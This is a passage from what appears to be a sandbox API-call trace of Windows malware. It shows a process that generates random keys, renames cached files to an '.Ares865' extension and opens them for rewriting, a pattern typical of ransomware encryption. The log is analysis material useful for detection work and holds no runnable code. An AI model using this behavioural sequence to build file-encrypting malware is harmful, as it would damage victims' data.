CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.150] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.151] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.151] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.151] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150.Ares865") returned 156 [0110.151] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\bc570ec0de58335afaf92fdc8e3aa330_6ce6e578b5c8485b4be3c4d58e12f150"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\bc570ec0de58335afaf92fdc8e3aa330_6ce6e578b5c8485b4be3c4d58e12f150.ares865"), dwFlags=0x1) returned 1 [0110.153] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\bc570ec0de58335afaf92fdc8e3aa330_6ce6e578b5c8485b4be3c4d58e12f150.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.153] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=516) returned 1 [0110.153] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.153] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.153] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.153] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.154] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.154] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.157] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.158] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.158] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.158] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC.Ares865") returned 156 [0110.158] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\bc570ec0de58335afaf92fdc8e3aa330_f4d449ca9e0eaccfe15946f8fcd349fc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\bc570ec0de58335afaf92fdc8e3aa330_f4d449ca9e0eaccfe15946f8fcd349fc.ares865"), dwFlags=0x1) returned 1 [0110.160] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\bc570ec0de58335afaf92fdc8e3aa330_f4d449ca9e0eaccfe15946f8fcd349fc.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.160] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=516) returned 1 [0110.160] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.160] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.160] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.160] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.161] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.161] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.164] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.165] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.165] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.165] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873.Ares865") returned 156 [0110.165] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_42820cdfea41dc84aab89a6b63561873"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_42820cdfea41dc84aab89a6b63561873.ares865"), dwFlags=0x1) returned 1 [0110.167] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_42820cdfea41dc84aab89a6b63561873.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.167] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=402) returned 1 [0110.167] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.167] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.167] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.167] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.168] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.168] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.172] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.172] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.172] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.173] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE.Ares865") returned 156 [0110.173] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_6043fc604a395e1485af7ac16d16b7ce"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_6043fc604a395e1485af7ac16d16b7ce.ares865"), dwFlags=0x1) returned 1 [0110.174] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_6043fc604a395e1485af7ac16d16b7ce.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.175] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=398) returned 1 [0110.175] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.175] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.175] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.175] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.176] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.176] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.180] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.181] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.181] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.181] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF.Ares865") returned 156 [0110.181] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf.ares865"), dwFlags=0x1) returned 1 [0110.183] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.183] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=398) returned 1 [0110.183] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.183] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.183] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.183] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.184] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.184] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.188] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.188] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.188] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.189] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC.Ares865") returned 156 [0110.189] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d47dbd2f9e3365fbbe008d71fb06716f_4dd1053bcc726da41115fff4c7d6e9cc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d47dbd2f9e3365fbbe008d71fb06716f_4dd1053bcc726da41115fff4c7d6e9cc.ares865"), dwFlags=0x1) returned 1 [0110.190] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d47dbd2f9e3365fbbe008d71fb06716f_4dd1053bcc726da41115fff4c7d6e9cc.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.191] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=404) returned 1 [0110.191] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.191] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.191] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.191] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.192] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.192] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.201] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.202] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.202] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.202] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE.Ares865") returned 156 [0110.202] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d47dbd2f9e3365fbbe008d71fb06716f_d33192d58aa9ca2b9097e848e9fe86de"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d47dbd2f9e3365fbbe008d71fb06716f_d33192d58aa9ca2b9097e848e9fe86de.ares865"), dwFlags=0x1) returned 1 [0110.204] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d47dbd2f9e3365fbbe008d71fb06716f_d33192d58aa9ca2b9097e848e9fe86de.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.204] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=408) returned 1 [0110.204] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.204] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.204] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.204] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.205] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.205] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.208] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.208] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.208] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.209] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C.Ares865") returned 156 [0110.209] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d52c56d8f24bec96604372afbaf264e1_e76a2b627dd019eb51d9335f24b14c2c"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d52c56d8f24bec96604372afbaf264e1_e76a2b627dd019eb51d9335f24b14c2c.ares865"), dwFlags=0x1) returned 1 [0110.211] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d52c56d8f24bec96604372afbaf264e1_e76a2b627dd019eb51d9335f24b14c2c.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.211] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=420) returned 1 [0110.211] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.211] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.211] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.211] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.212] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.212] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.214] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.215] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.215] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.215] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585.Ares865") returned 156 [0110.215] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\ea618097e393409afa316f0f87e2c202_827c1b837652b048c4c84237d0838585"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\ea618097e393409afa316f0f87e2c202_827c1b837652b048c4c84237d0838585.ares865"), dwFlags=0x1) returned 1 [0110.218] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\ea618097e393409afa316f0f87e2c202_827c1b837652b048c4c84237d0838585.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.218] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=398) returned 1 [0110.218] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.218] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.218] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.218] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 